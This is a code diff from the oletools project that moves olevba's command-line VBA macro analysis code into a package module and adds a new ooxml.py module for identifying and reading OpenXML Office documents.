- decoded = decoded.replace('"', '""')
- deobf_code = deobf_code.replace(encoded, '"%s"' % decoded)
- return deobf_code
- #TODO: repasser l'analyse plusieurs fois si des chaines hex ou base64 sont revelees
-
-
- def find_vba_forms(self):
- """
- Finds all the VBA forms stored in an OLE file.
-
- Return None if the file is not OLE but OpenXML.
- Return a list of tuples (vba_root, project_path, dir_path) for each VBA project.
- vba_root is the path of the root OLE storage containing the VBA project,
- including a trailing slash unless it is the root of the OLE file.
- project_path is the path of the OLE stream named "PROJECT" within the VBA project.
- dir_path is the path of the OLE stream named "VBA/dir" within the VBA project.
-
- If this function returns an empty list for one of the supported formats
- (i.e. Word, Excel, Powerpoint), then the file does not contain VBA forms.
-
- :return: None if OpenXML file, list of tuples (vba_root, project_path, dir_path)
- for each VBA project found if OLE file
- """
- log.debug('VBA_Parser.find_vba_forms')
-
- # if the file is not OLE but OpenXML, return None:
- if self.ole_file is None and self.type != TYPE_PPT:
- return None
-
- # if this method has already been called, return previous result:
- # if self.vba_projects is not None:
- # return self.vba_projects
-
- # According to MS-OFORMS section 2.1.2 Control Streams:
- # - A parent control, that is, a control that can contain embedded controls,
- # MUST be persisted as a storage that contains multiple streams.
- # - All parent controls MUST contain a FormControl. The FormControl
- # properties are persisted to a stream (1) as specified in section 2.1.1.2.
- # The name of this stream (1) MUST be "f".
- # - Embedded controls that cannot themselves contain other embedded
- # controls are persisted sequentially as FormEmbeddedActiveXControls
- # to a stream (1) contained in the same storage as the parent control.
- # The name of this stream (1) MUST be "o".
- # - all names are case-insensitive
-
- if self.type == TYPE_PPT:
- # TODO: so far, this function is never called for PPT files, but
- # if that happens, the information is lost which ole file contains
- # which storage!
- ole_files = self.ole_subfiles
- log.warning('Returned info is not complete for PPT types!')
- else:
- ole_files = [self.ole_file, ]
-
- # start with an empty list:
- self.vba_forms = []
-
- # Loop over ole streams
- for ole in ole_files:
- # Look for any storage containing those storage/streams:
- for storage in ole.listdir(streams=False, storages=True):
- log.debug('Checking storage %r' % storage)
- # Look for two streams named 'o' and 'f':
- o_stream = storage + ['o']
- f_stream = storage + ['f']
- log.debug('Checking if streams %r and %r exist' % (f_stream, o_stream))
- if ole.exists(o_stream) and ole.get_type(o_stream) == olefile.STGTY_STREAM \
- and ole.exists(f_stream) and ole.get_type(f_stream) == olefile.STGTY_STREAM:
- form_path = '/'.join(storage)
- log.debug('Found VBA Form: %r' % form_path)
- self.vba_forms.append(storage)
- return self.vba_forms
-
- def extract_form_strings(self):
- """
- Extract printable strings from each VBA Form found in the file
-
- Iterator: yields (filename, stream_path, vba_filename, vba_code) for each VBA macro found
- If the file is OLE, filename is the path of the file.
- If the file is OpenXML, filename is the path of the OLE subfile containing VBA macros
- within the zip archive, e.g. word/vbaProject.bin.
- If the file is PPT, result is as for OpenXML but filename is useless
- """
- if self.ole_file is None:
- # This may be either an OpenXML/PPT or a text file:
- if self.type == TYPE_TEXT:
- # This is a text file, return no results:
- return
- else:
- # OpenXML/PPT: recursively yield results from each OLE subfile:
- for ole_subfile in self.ole_subfiles:
- for results in ole_subfile.extract_form_strings():
- yield results
- else:
- # This is an OLE file:
- self.find_vba_forms()
- ole = self.ole_file
- for form_storage in self.vba_forms:
- o_stream = form_storage + ['o']
- log.debug('Opening form object stream %r' % '/'.join(o_stream))
- form_data = ole.openstream(o_stream).read()
- # Extract printable strings from the form object stream "o":
- for m in re_printable_string.finditer(form_data):
- log.debug('Printable string found in form: %r' % m.group())
- yield (self.filename, '/'.join(o_stream), m.group())
-
-
- def close(self):
- """
- Close all the open files. This method must be called after usage, if
- the application is opening many files.
- """
- if self.ole_file is None:
- if self.ole_subfiles is not None:
- for ole_subfile in self.ole_subfiles:
- ole_subfile.close()
- else:
- self.ole_file.close()
-
-
-
-class VBA_Parser_CLI(VBA_Parser):
- """
- VBA parser and analyzer, adding methods for the command line interface
- of olevba. (see VBA_Parser)
- """
-
- def __init__(self, *args, **kwargs):
- """
- Constructor for VBA_Parser_CLI.
- Calls __init__ from VBA_Parser with all arguments --> see doc there
- """
- super(VBA_Parser_CLI, self).__init__(*args, **kwargs)
-
-
- def print_analysis(self, show_decoded_strings=False, deobfuscate=False):
- """
- Analyze the provided VBA code, and print the results in a table
-
- :param vba_code: str, VBA source code to be analyzed
- :param show_decoded_strings: bool, if True hex-encoded strings will be displayed with their decoded content.
- :param deobfuscate: bool, if True attempt to deobfuscate VBA expressions (slow)
- :return: None
- """
- # print a waiting message only if the output is not redirected to a file:
- if sys.stdout.isatty():
- print('Analysis...\r')
- sys.stdout.flush()
- results = self.analyze_macros(show_decoded_strings, deobfuscate)
- if results:
- t = prettytable.PrettyTable(('Type', 'Keyword', 'Description'))
- t.align = 'l'
- t.max_width['Type'] = 10
- t.max_width['Keyword'] = 20
- t.max_width['Description'] = 39
- for kw_type, keyword, description in results:
- # handle non printable strings:
- if not is_printable(keyword):
- keyword = repr(keyword)
- if not is_printable(description):
- description = repr(description)
- t.add_row((kw_type, keyword, description))
- print(t)
- else:
- print('No suspicious keyword or IOC found.')
-
- def print_analysis_json(self, show_decoded_strings=False, deobfuscate=False):
- """
- Analyze the provided VBA code, and return the results in json format
-
- :param vba_code: str, VBA source code to be analyzed
- :param show_decoded_strings: bool, if True hex-encoded strings will be displayed with their decoded content.
- :param deobfuscate: bool, if True attempt to deobfuscate VBA expressions (slow)
-
- :return: dict
- """
- # print a waiting message only if the output is not redirected to a file:
- if sys.stdout.isatty():
- print('Analysis...\r')
- sys.stdout.flush()
- return [dict(type=kw_type, keyword=keyword, description=description)
- for kw_type, keyword, description in self.analyze_macros(show_decoded_strings, deobfuscate)]
-
- def process_file(self, show_decoded_strings=False,
- display_code=True, hide_attributes=True,
- vba_code_only=False, show_deobfuscated_code=False,
- deobfuscate=False):
- """
- Process a single file
-
- :param filename: str, path and filename of file on disk, or within the container.
- :param data: bytes, content of the file if it is in a container, None if it is a file on disk.
- :param show_decoded_strings: bool, if True hex-encoded strings will be displayed with their decoded content.
- :param display_code: bool, if False VBA source code is not displayed (default True)
- :param global_analysis: bool, if True all modules are merged for a single analysis (default),
- otherwise each module is analyzed separately (old behaviour)
- :param hide_attributes: bool, if True the first lines starting with "Attribute VB" are hidden (default)
- :param deobfuscate: bool, if True attempt to deobfuscate VBA expressions (slow)
- """
- #TODO: replace print by writing to a provided output file (sys.stdout by default)
- # fix conflicting parameters:
- if vba_code_only and not display_code:
- display_code = True
- if self.container:
- display_filename = '%s in %s' % (self.filename, self.container)
- else:
- display_filename = self.filename
- print('=' * 79)
- print('FILE:', display_filename)
- try:
- #TODO: handle olefile errors, when an OLE file is malformed
- print('Type: %s' % self.type)
- if self.detect_vba_macros():
- #print 'Contains VBA Macros:'
- for (subfilename, stream_path, vba_filename, vba_code) in self.extract_all_macros():
- if hide_attributes:
- # hide attribute lines:
- if isinstance(vba_code,bytes):
- vba_code =vba_code.decode('utf-8','backslashreplace')
- vba_code_filtered = filter_vba(vba_code)
- else:
- vba_code_filtered = vba_code
- print('-' * 79)
- print('VBA MACRO %s ' % vba_filename)
- print('in file: %s - OLE stream: %s' % (subfilename, repr(stream_path)))
- if display_code:
- print('- ' * 39)
- # detect empty macros:
- if vba_code_filtered.strip() == '':
- print('(empty macro)')
- else:
- print(vba_code_filtered)
- for (subfilename, stream_path, form_string) in self.extract_form_strings():
- print('-' * 79)
- print('VBA FORM STRING IN %r - OLE stream: %r' % (subfilename, stream_path))
- print('- ' * 39)
- print(form_string.decode('utf-8', 'ignore'))
- if not vba_code_only:
- # analyse the code from all modules at once:
- self.print_analysis(show_decoded_strings, deobfuscate)
- if show_deobfuscated_code:
- print('MACRO SOURCE CODE WITH DEOBFUSCATED VBA STRINGS (EXPERIMENTAL):\n\n')
- print(self.reveal())
- else:
- print('No VBA macros found.')
- except OlevbaBaseException:
- raise
- except Exception as exc:
- # display the exception with full stack trace for debugging
- log.info('Error processing file %s (%s)' % (self.filename, exc))
- log.debug('Traceback:', exc_info=True)
- raise ProcessingError(self.filename, exc)
- print('')
-
-
- def process_file_json(self, show_decoded_strings=False,
- display_code=True, hide_attributes=True,
- vba_code_only=False, show_deobfuscated_code=False,
- deobfuscate=False):
- """
- Process a single file
-
- every "show" or "print" here is to be translated as "add to json"
-
- :param filename: str, path and filename of file on disk, or within the container.
- :param data: bytes, content of the file if it is in a container, None if it is a file on disk.
- :param show_decoded_strings: bool, if True hex-encoded strings will be displayed with their decoded content.
- :param display_code: bool, if False VBA source code is not displayed (default True)
- :param global_analysis: bool, if True all modules are merged for a single analysis (default),
- otherwise each module is analyzed separately (old behaviour)
- :param hide_attributes: bool, if True the first lines starting with "Attribute VB" are hidden (default)
- :param deobfuscate: bool, if True attempt to deobfuscate VBA expressions (slow)
- """
- #TODO: fix conflicting parameters (?)
-
- if vba_code_only and not display_code:
- display_code = True
-
- result = {}
-
- if self.container:
- result['container'] = self.container
- else:
- result['container'] = None
- result['file'] = self.filename
- result['json_conversion_successful'] = False
- result['analysis'] = None
- result['code_deobfuscated'] = None
- result['do_deobfuscate'] = deobfuscate
-
- try:
- #TODO: handle olefile errors, when an OLE file is malformed
- result['type'] = self.type
- macros = []
- if self.detect_vba_macros():
- for (subfilename, stream_path, vba_filename, vba_code) in self.extract_all_macros():
- curr_macro = {}
- if hide_attributes:
- # hide attribute lines:
- vba_code_filtered = filter_vba(vba_code.decode('utf-8','backslashreplace'))
- else:
- vba_code_filtered = vba_code
-
- curr_macro['vba_filename'] = vba_filename
- curr_macro['subfilename'] = subfilename
- curr_macro['ole_stream'] = stream_path
- if display_code:
- curr_macro['code'] = vba_code_filtered.strip()
- else:
- curr_macro['code'] = None
- macros.append(curr_macro)
- if not vba_code_only:
- # analyse the code from all modules at once:
- result['analysis'] = self.print_analysis_json(show_decoded_strings,
- deobfuscate)
- if show_deobfuscated_code:
- result['code_deobfuscated'] = self.reveal()
- result['macros'] = macros
- result['json_conversion_successful'] = True
- except Exception as exc:
- # display the exception with full stack trace for debugging
- log.info('Error processing file %s (%s)' % (self.filename, exc))
- log.debug('Traceback:', exc_info=True)
- raise ProcessingError(self.filename, exc)
-
- return result
-
-
- def process_file_triage(self, show_decoded_strings=False, deobfuscate=False):
- """
- Process a file in triage mode, showing only summary results on one line.
- """
- #TODO: replace print by writing to a provided output file (sys.stdout by default)
- try:
- #TODO: handle olefile errors, when an OLE file is malformed
- if self.detect_vba_macros():
- # print a waiting message only if the output is not redirected to a file:
- if sys.stdout.isatty():
- print('Analysis...\r', end='')
- sys.stdout.flush()
- self.analyze_macros(show_decoded_strings=show_decoded_strings,
- deobfuscate=deobfuscate)
- flags = TYPE2TAG[self.type]
- macros = autoexec = suspicious = iocs = hexstrings = base64obf = dridex = vba_obf = '-'
- if self.contains_macros: macros = 'M'
- if self.nb_autoexec: autoexec = 'A'
- if self.nb_suspicious: suspicious = 'S'
- if self.nb_iocs: iocs = 'I'
- if self.nb_hexstrings: hexstrings = 'H'
- if self.nb_base64strings: base64obf = 'B'
- if self.nb_dridexstrings: dridex = 'D'
- if self.nb_vbastrings: vba_obf = 'V'
- flags += '%s%s%s%s%s%s%s%s' % (macros, autoexec, suspicious, iocs, hexstrings,
- base64obf, dridex, vba_obf)
-
- line = '%-12s %s' % (flags, self.filename)
- print(line)
-
- # old table display:
- # macros = autoexec = suspicious = iocs = hexstrings = 'no'
- # if nb_macros: macros = 'YES:%d' % nb_macros
- # if nb_autoexec: autoexec = 'YES:%d' % nb_autoexec
- # if nb_suspicious: suspicious = 'YES:%d' % nb_suspicious
- # if nb_iocs: iocs = 'YES:%d' % nb_iocs
- # if nb_hexstrings: hexstrings = 'YES:%d' % nb_hexstrings
- # # 2nd line = info
- # print '%-8s %-7s %-7s %-7s %-7s %-7s' % (self.type, macros, autoexec, suspicious, iocs, hexstrings)
- except Exception as exc:
- # display the exception with full stack trace for debugging only
- log.debug('Error processing file %s (%s)' % (self.filename, exc),
- exc_info=True)
- raise ProcessingError(self.filename, exc)
-
-
- # t = prettytable.PrettyTable(('filename', 'type', 'macros', 'autoexec', 'suspicious', 'ioc', 'hexstrings'),
- # header=False, border=False)
- # t.align = 'l'
- # t.max_width['filename'] = 30
- # t.max_width['type'] = 10
- # t.max_width['macros'] = 6
- # t.max_width['autoexec'] = 6
- # t.max_width['suspicious'] = 6
- # t.max_width['ioc'] = 6
- # t.max_width['hexstrings'] = 6
- # t.add_row((filename, ftype, macros, autoexec, suspicious, iocs, hexstrings))
- # print t
-
-
-#=== MAIN =====================================================================
-
-def main():
- """
- Main function, called when olevba is run from the command line
- """
- DEFAULT_LOG_LEVEL = "warning" # Default log level
- LOG_LEVELS = {
- 'debug': logging.DEBUG,
- 'info': logging.INFO,
- 'warning': logging.WARNING,
- 'error': logging.ERROR,
- 'critical': logging.CRITICAL
- }
-
- usage = 'usage: %prog [options] [filename2 ...]'
- parser = optparse.OptionParser(usage=usage)
- # parser.add_option('-o', '--outfile', dest='outfile',
- # help='output file')
- # parser.add_option('-c', '--csv', dest='csv',
- # help='export results to a CSV file')
- parser.add_option("-r", action="store_true", dest="recursive",
- help='find files recursively in subdirectories.')
- parser.add_option("-z", "--zip", dest='zip_password', type='str', default=None,
- help='if the file is a zip archive, open all files from it, using the provided password (requires Python 2.6+)')
- parser.add_option("-f", "--zipfname", dest='zip_fname', type='str', default='*',
- help='if the file is a zip archive, file(s) to be opened within the zip. Wildcards * and ? are supported. (default:*)')
- # output mode; could make this even simpler with add_option(type='choice') but that would make
- # cmd line interface incompatible...
- modes = optparse.OptionGroup(parser, title='Output mode (mutually exclusive)')
- modes.add_option("-t", '--triage', action="store_const", dest="output_mode",
- const='triage', default='unspecified',
- help='triage mode, display results as a summary table (default for multiple files)')
- modes.add_option("-d", '--detailed', action="store_const", dest="output_mode",
- const='detailed', default='unspecified',
- help='detailed mode, display full results (default for single file)')
- modes.add_option("-j", '--json', action="store_const", dest="output_mode",
- const='json', default='unspecified',
- help='json mode, detailed in json format (never default)')
- parser.add_option_group(modes)
- parser.add_option("-a", '--analysis', action="store_false", dest="display_code", default=True,
- help='display only analysis results, not the macro source code')
- parser.add_option("-c", '--code', action="store_true", dest="vba_code_only", default=False,
- help='display only VBA source code, do not analyze it')
- parser.add_option("--decode", action="store_true", dest="show_decoded_strings",
- help='display all the obfuscated strings with their decoded content (Hex, Base64, StrReverse, Dridex, VBA).')
- parser.add_option("--attr", action="store_false", dest="hide_attributes", default=True,
- help='display the attribute lines at the beginning of VBA source code')
- parser.add_option("--reveal", action="store_true", dest="show_deobfuscated_code",
- help='display the macro source code after replacing all the obfuscated strings by their decoded content.')
- parser.add_option('-l', '--loglevel', dest="loglevel", action="store", default=DEFAULT_LOG_LEVEL,
- help="logging level debug/info/warning/error/critical (default=%default)")
- parser.add_option('--deobf', dest="deobfuscate", action="store_true", default=False,
- help="Attempt to deobfuscate VBA expressions (slow)")
- parser.add_option('--relaxed', dest="relaxed", action="store_true", default=False,
- help="Do not raise errors if opening of substream fails")
-
- (options, args) = parser.parse_args()
-
- # Print help if no arguments are passed
- if len(args) == 0:
- print(__doc__)
- parser.print_help()
- sys.exit(RETURN_WRONG_ARGS)
-
- # provide info about tool and its version
- if options.output_mode == 'json':
- # prints opening [
- print_json(script_name='olevba', version=__version__,
- url='http://decalage.info/python/oletools',
- type='MetaInformation')
- else:
- print('olevba %s - http://decalage.info/python/oletools' % __version__)
-
- logging.basicConfig(level=LOG_LEVELS[options.loglevel], format='%(levelname)-8s %(message)s')
- # enable logging in the modules:
- log.setLevel(logging.NOTSET)
-
- # Old display with number of items detected:
- # print '%-8s %-7s %-7s %-7s %-7s %-7s' % ('Type', 'Macros', 'AutoEx', 'Susp.', 'IOCs', 'HexStr')
- # print '%-8s %-7s %-7s %-7s %-7s %-7s' % ('-'*8, '-'*7, '-'*7, '-'*7, '-'*7, '-'*7)
-
- # with the option --reveal, make sure --deobf is also enabled:
- if options.show_deobfuscated_code and not options.deobfuscate:
- log.info('set --deobf because --reveal was set')
- options.deobfuscate = True
- if options.output_mode == 'triage' and options.show_deobfuscated_code:
- log.info('ignoring option --reveal in triage output mode')
-
- # Column headers (do not know how many files there will be yet, so if no output_mode
- # was specified, we will print triage for first file --> need these headers)
- if options.output_mode in ('triage', 'unspecified'):
- print('%-12s %-65s' % ('Flags', 'Filename'))
- print('%-12s %-65s' % ('-' * 11, '-' * 65))
-
- previous_container = None
- count = 0
- container = filename = data = None
- vba_parser = None
- return_code = RETURN_OK
- try:
- for container, filename, data in xglob.iter_files(args, recursive=options.recursive,
- zip_password=options.zip_password, zip_fname=options.zip_fname):
- # ignore directory names stored in zip files:
- if container and filename.endswith('/'):
- continue
-
- # handle errors from xglob
- if isinstance(data, Exception):
- if isinstance(data, PathNotFoundException):
- if options.output_mode in ('triage', 'unspecified'):
- print('%-12s %s - File not found' % ('?', filename))
- elif options.output_mode != 'json':
- log.error('Given path %r does not exist!' % filename)
- return_code = RETURN_FILE_NOT_FOUND if return_code == 0 \
- else RETURN_SEVERAL_ERRS
- else:
- if options.output_mode in ('triage', 'unspecified'):
- print('%-12s %s - Failed to read from zip file %s' % ('?', filename, container))
- elif options.output_mode != 'json':
- log.error('Exception opening/reading %r from zip file %r: %s'
- % (filename, container, data))
- return_code = RETURN_XGLOB_ERR if return_code == 0 \
- else RETURN_SEVERAL_ERRS
- if options.output_mode == 'json':
- print_json(file=filename, type='error',
- error=type(data).__name__, message=str(data))
- continue
-
- try:
- # Open the file
- vba_parser = VBA_Parser_CLI(filename, data=data, container=container,
- relaxed=options.relaxed)
-
- if options.output_mode == 'detailed':
- # fully detailed output
- vba_parser.process_file(show_decoded_strings=options.show_decoded_strings,
- display_code=options.display_code,
- hide_attributes=options.hide_attributes, vba_code_only=options.vba_code_only,
- show_deobfuscated_code=options.show_deobfuscated_code,
- deobfuscate=options.deobfuscate)
- elif options.output_mode in ('triage', 'unspecified'):
- # print container name when it changes:
- if container != previous_container:
- if container is not None:
- print('\nFiles in %s:' % container)
- previous_container = container
- # summarized output for triage:
- vba_parser.process_file_triage(show_decoded_strings=options.show_decoded_strings,
- deobfuscate=options.deobfuscate)
- elif options.output_mode == 'json':
- print_json(
- vba_parser.process_file_json(show_decoded_strings=options.show_decoded_strings,
- display_code=options.display_code,
- hide_attributes=options.hide_attributes, vba_code_only=options.vba_code_only,
- show_deobfuscated_code=options.show_deobfuscated_code,
- deobfuscate=options.deobfuscate))
- else: # (should be impossible)
- raise ValueError('unexpected output mode: "{0}"!'.format(options.output_mode))
- count += 1
-
- except (SubstreamOpenError, UnexpectedDataError) as exc:
- if options.output_mode in ('triage', 'unspecified'):
- print('%-12s %s - Error opening substream or uenxpected ' \
- 'content' % ('?', filename))
- elif options.output_mode == 'json':
- print_json(file=filename, type='error',
- error=type(exc).__name__, message=str(exc))
- else:
- log.exception('Error opening substream or unexpected '
- 'content in %s' % filename)
- return_code = RETURN_OPEN_ERROR if return_code == 0 \
- else RETURN_SEVERAL_ERRS
- except FileOpenError as exc:
- if options.output_mode in ('triage', 'unspecified'):
- print('%-12s %s - File format not supported' % ('?', filename))
- elif options.output_mode == 'json':
- print_json(file=filename, type='error',
- error=type(exc).__name__, message=str(exc))
- else:
- log.exception('Failed to open %s -- probably not supported!' % filename)
- return_code = RETURN_OPEN_ERROR if return_code == 0 \
- else RETURN_SEVERAL_ERRS
- except ProcessingError as exc:
- if options.output_mode in ('triage', 'unspecified'):
- print('%-12s %s - %s' % ('!ERROR', filename, exc.orig_exc))
- elif options.output_mode == 'json':
- print_json(file=filename, type='error',
- error=type(exc).__name__,
- message=str(exc.orig_exc))
- else:
- log.exception('Error processing file %s (%s)!'
- % (filename, exc.orig_exc))
- return_code = RETURN_PARSE_ERROR if return_code == 0 \
- else RETURN_SEVERAL_ERRS
- finally:
- if vba_parser is not None:
- vba_parser.close()
-
- if options.output_mode == 'triage':
- print('\n(Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, TXT=Text, M=Macros, ' \
- 'A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, ' \
- 'B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)\n')
-
- if count == 1 and options.output_mode == 'unspecified':
- # if options -t, -d and -j were not specified and it's a single file, print details:
- vba_parser.process_file(show_decoded_strings=options.show_decoded_strings,
- display_code=options.display_code,
- hide_attributes=options.hide_attributes, vba_code_only=options.vba_code_only,
- show_deobfuscated_code=options.show_deobfuscated_code,
- deobfuscate=options.deobfuscate)
-
- if options.output_mode == 'json':
- # print last json entry (a last one without a comma) and closing ]
- print_json(type='MetaInformation', return_code=return_code,
- n_processed=count, _json_is_last=True)
-
- except Exception as exc:
- # some unexpected error, maybe some of the types caught in except clauses
- # above were not sufficient. This is very bad, so log complete trace at exception level
- # and do not care about output mode
- log.exception('Unhandled exception in main: %s' % exc, exc_info=True)
- return_code = RETURN_UNEXPECTED # even if there were others before -- this is more important
- # TODO: print msg with URL to report issues (except in JSON mode)
-
- # done. exit
- log.debug('will exit now with code %s' % return_code)
- sys.exit(return_code)
+from oletools.olevba import *
+from oletools.olevba import __doc__, __version__
if __name__ == '__main__':
main()
-# This was coded while listening to "Dust" from I Love You But I've Chosen Darkness
diff --git a/oletools/ooxml.py b/oletools/ooxml.py
new file mode 100644
index 00000000..57fd16fd
--- /dev/null
+++ b/oletools/ooxml.py
@@ -0,0 +1,726 @@
+#!/usr/bin/env python3
+
+""" Common operations for OpenXML files (docx, xlsx, pptx, ...)
+
+This is mostly based on ECMA-376 (5th edition, Part 1)
+http://www.ecma-international.org/publications/standards/Ecma-376.htm
+
+See also: Notes on Microsoft's implementation of ECMA-376: [MS-0E376]
+
+.. codeauthor:: Intra2net AG
+License: BSD, see source code or documentation
+
+ooxml is part of the python-oletools package:
+http://www.decalage.info/python/oletools
+"""
+
+# === LICENSE =================================================================
+
+# ooxml is copyright (c) 2017-2020 Philippe Lagadec (http://www.decalage.info)
+# All rights reserved.
+#
+# Redistribution and use in source and binary forms, with or without
+# modification, are permitted provided that the following conditions are met:
+#
+# * Redistributions of source code must retain the above copyright notice,
+# this list of conditions and the following disclaimer.
+# * Redistributions in binary form must reproduce the above copyright notice,
+# this list of conditions and the following disclaimer in the documentation
+# and/or other materials provided with the distribution.
+#
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
+# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
+# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
+# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
+# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
+# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
+# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
+# POSSIBILITY OF SUCH DAMAGE.
+
+# -----------------------------------------------------------------------------
+# CHANGELOG:
+# 2018-12-06 CH: - ensure stdout can handle unicode
+
+__version__ = '0.54.2'
+
+# -- TODO ---------------------------------------------------------------------
+
+# TODO: may have to tell apart single xml types: office2003 looks much different
+# than 2006+ --> DOCTYPE_*_XML2003
+# TODO: check what is duplicate here with oleid, maybe merge some day?
+# TODO: "xml2003" == "flatopc"? (No)
+
+
+# -- IMPORTS ------------------------------------------------------------------
+
+import sys
+from oletools.common.log_helper import log_helper
+from oletools.common.io_encoding import uopen
+from zipfile import ZipFile, BadZipfile, is_zipfile
+from os.path import splitext
+import io
+import re
+
+# import lxml or ElementTree for XML parsing:
+try:
+ # lxml: best performance for XML processing
+ import lxml.etree as ET
+except ImportError:
+ import xml.etree.cElementTree as ET
+
+###############################################################################
+# CONSTANTS
+###############################################################################
+
+
+logger = log_helper.get_or_create_silent_logger('ooxml')
+
+#: subfiles that have to be part of every ooxml file
+FILE_CONTENT_TYPES = '[Content_Types].xml'
+FILE_RELATIONSHIPS = '_rels/.rels'
+
+#: start of content type attributes
+CONTENT_TYPES_EXCEL = (
+ 'application/vnd.openxmlformats-officedocument.spreadsheetml.',
+ 'application/vnd.ms-excel.',
+)
+CONTENT_TYPES_WORD = (
+ 'application/vnd.openxmlformats-officedocument.wordprocessingml.',
+)
+CONTENT_TYPES_PPT = (
+ 'application/vnd.openxmlformats-officedocument.presentationml.',
+)
+
+#: other content types (currently unused)
+CONTENT_TYPES_NEUTRAL = (
+ 'application/xml',
+ 'application/vnd.openxmlformats-package.relationships+xml',
+ 'application/vnd.openxmlformats-package.core-properties+xml',
+ 'application/vnd.openxmlformats-officedocument.theme+xml',
+ 'application/vnd.openxmlformats-officedocument.extended-properties+xml'
+)
+
+#: constants used to determine type of single-xml files
+OFFICE_XML_PROGID_REGEX = r'<\?mso-application progid="(.*)"\?>'
+WORD_XML_PROG_ID = 'Word.Document'
+EXCEL_XML_PROG_ID = 'Excel.Sheet'
+
+#: constants for document type
+DOCTYPE_WORD = 'word'
+DOCTYPE_EXCEL = 'excel'
+DOCTYPE_POWERPOINT = 'powerpoint'
+DOCTYPE_NONE = 'none'
+DOCTYPE_MIXED = 'mixed'
+DOCTYPE_WORD_XML = 'word-xml'
+DOCTYPE_EXCEL_XML = 'excel-xml'
+DOCTYPE_WORD_XML2003 = 'word-xml2003'
+DOCTYPE_EXCEL_XML2003 = 'excel-xml2003'
+
+
+###############################################################################
+# HELPERS
+###############################################################################
+
+
+def debug_str(elem):
+ """ for debugging: print an element """
+ if elem is None:
+ return u'None'
+ if elem.tag[0] == '{' and elem.tag.count('}') == 1:
+ parts = ['[tag={{...}}{0}'.format(elem.tag[elem.tag.index('}')+1:]), ]
+ else:
+ parts = ['[tag={0}'.format(elem.tag), ]
+ if elem.text:
+ parts.append(u'text="{0}"'.format(elem.text.replace('\n', '\\n')))
+ if elem.tail:
+ parts.append(u'tail="{0}"'.format(elem.tail.replace('\n', '\\n')))
+ for key, value in elem.attrib.items():
+ parts.append(u'{0}="{1}"'.format(key, value))
+ if key == 'ContentType':
+ if value.startswith(CONTENT_TYPES_EXCEL):
+ parts[-1] += u'-->xls'
+ elif value.startswith(CONTENT_TYPES_WORD):
+ parts[-1] += u'-->doc'
+ elif value.startswith(CONTENT_TYPES_PPT):
+ parts[-1] += u'-->ppt'
+ elif value in CONTENT_TYPES_NEUTRAL:
+ parts[-1] += u'-->_'
+ else:
+ parts[-1] += u'!!!'
+
+ text = u', '.join(parts)
+ if len(text) > 150:
+ return text[:147] + u'...]'
+ return text + u']'
+
+
+def isstr(some_var):
+ """ version-independent test for isinstance(some_var, (str, unicode)) """
+ if sys.version_info.major == 2:
+ return isinstance(some_var, basestring) # true for str and unicode
+ return isinstance(some_var, str) # there is no unicode
+
+
+###############################################################################
+# INFO ON FILES
+###############################################################################
+
+
+def get_type(filename):
+ """ return one of the DOCTYPE_* constants or raise error """
+ parser = XmlParser(filename)
+ if parser.is_single_xml():
+ match = None
+ with uopen(filename, 'r') as handle:
+ match = re.search(OFFICE_XML_PROGID_REGEX, handle.read(1024))
+ if not match:
+ return DOCTYPE_NONE
+ prog_id = match.groups()[0]
+ if prog_id == WORD_XML_PROG_ID:
+ return DOCTYPE_WORD_XML
+ if prog_id == EXCEL_XML_PROG_ID:
+ return DOCTYPE_EXCEL_XML
+ return DOCTYPE_NONE
+
+ is_doc = False
+ is_xls = False
+ is_ppt = False
+ try:
+ for _, elem, _ in parser.iter_xml(FILE_CONTENT_TYPES):
+ logger.debug(u' ' + debug_str(elem))
+ try:
+ content_type = elem.attrib['ContentType']
+ except KeyError: # ContentType not an attr
+ continue
+ is_xls |= content_type.startswith(CONTENT_TYPES_EXCEL)
+ is_doc |= content_type.startswith(CONTENT_TYPES_WORD)
+ is_ppt |= content_type.startswith(CONTENT_TYPES_PPT)
+ except BadOOXML as oo_err:
+ if oo_err.more_info.startswith('invalid subfile') and \
+ FILE_CONTENT_TYPES in oo_err.more_info:
+ # no FILE_CONTENT_TYPES in zip, so probably no ms office xml.
+ return DOCTYPE_NONE
+ raise
+
+ if is_doc and not is_xls and not is_ppt:
+ return DOCTYPE_WORD
+ if not is_doc and is_xls and not is_ppt:
+ return DOCTYPE_EXCEL
+ if not is_doc and not is_xls and is_ppt:
+ return DOCTYPE_POWERPOINT
+ if not is_doc and not is_xls and not is_ppt:
+ return DOCTYPE_NONE
+ logger.warning('Encountered contradictory content types')
+ return DOCTYPE_MIXED
+
+
+def is_ooxml(filename):
+ """ Determine whether given file is an ooxml file; tries get_type """
+ try:
+ doctype = get_type(filename)
+ except BadOOXML:
+ return False
+ except IOError: # one of the required files is not present
+ return False
+ if doctype == DOCTYPE_NONE:
+ return False
+ return True
+
+
+###############################################################################
+# HELPER CLASSES
+###############################################################################
+
+
+class ZipSubFile(object):
+ """ A file-like object like ZipFile.open returns them, with size and seek()
+
+ ZipFile.open() gives file handles that can be read but not seek()ed since
+ the file is being decompressed in the background. This class implements a
+ reset() function (close and re-open stream) and a seek() that uses it.
+ --> can be used as argument to olefile.OleFileIO and olefile.isOleFile()
+
+ Can be used as a context manager::
+
+ with zipfile.ZipFile('file.zip') as zipper:
+ # replaces with zipper.open(subfile) as handle:
+ with ZipSubFile(zipper, 'subfile') as handle:
+ print('subfile in file.zip has size {0}, starts with {1}'
+ .format(handle.size, handle.read(20)))
+ handle.reset()
+
